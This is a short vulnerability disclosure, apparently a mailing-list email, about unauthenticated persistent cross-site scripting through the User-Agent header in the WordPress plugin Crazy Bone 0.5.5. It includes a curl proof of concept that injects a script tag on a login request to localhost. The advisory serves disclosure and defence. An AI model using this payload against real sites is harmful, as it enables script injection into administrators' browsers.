Subject: Persistent Cross-Site Scripting (XSS) in Crazy Bone 0.5.5
Date: Fri, 21 Aug 2015 11:19:23 +0200
Hello,
Plugin: Crazy Bone 0.5.5
https://wordpress.org/plugins/crazy-bone/
1. Persistent Cross-Site Scripting (XSS)
Unauthenticated attackers can inject html/js into User-Agent HTTP request header resulting in persistent XSS on page
http://local
host/wp-admin/users.php?page=crazy-bone%2Fplugin.php.
Verification:
curl -H "User-agent: <script>alert(1);</script>" --data "log=admin&pwd="
http://localhost/wp-login.php
And visit:
http://localhost/wp-admin/users.php?page=crazy-bone%2Fplugin.php
--
Regards,
Marcin Probola,